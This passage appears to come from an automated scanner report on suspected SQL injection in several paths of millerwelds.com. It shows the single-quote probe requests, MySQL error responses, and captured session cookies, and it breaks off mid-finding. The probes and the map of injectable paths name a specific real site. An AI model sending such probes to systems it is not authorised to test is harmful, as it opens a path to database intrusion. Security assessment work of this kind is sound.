1.69. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:10 GMT
Connection: Keep-Alive
Content-Length: 17965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:11 GMT
Connection: Keep-Alive
Content-Length: 19672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...

1.70. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:56 GMT
Connection: Keep-Alive
Content-Length: 27718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.71. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:59 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.72. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories/international'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:01 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.73. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/international/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:18 GMT
Connection: Keep-Alive
Content-Length: 19560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/international/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 21253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...

1.74. http://www.millerwelds.com/resources/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /resources'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:24 GMT
Connection: Keep-Alive
Content-Length: 27694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.75. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:46 GMT
Connection: Keep-Alive
Content-Length: 21518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /resources/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:48 GMT
Connection: Keep-Alive
Content-Length: 23256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.76. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /results/blog/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /results'/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:26 GMT
Connection: Keep-Alive
Content-Length: 27695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /results''/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:27 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.77. http://www.millerwelds.com/service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /service'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:21 GMT
Connection: Keep-Alive
Content-Length: 27690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.78. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /service/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:43 GMT
Connection: Keep-Alive
Content-Length: 22647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /service/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:44 GMT
Connection: Keep-Alive
Content-Length: 24387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.79. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

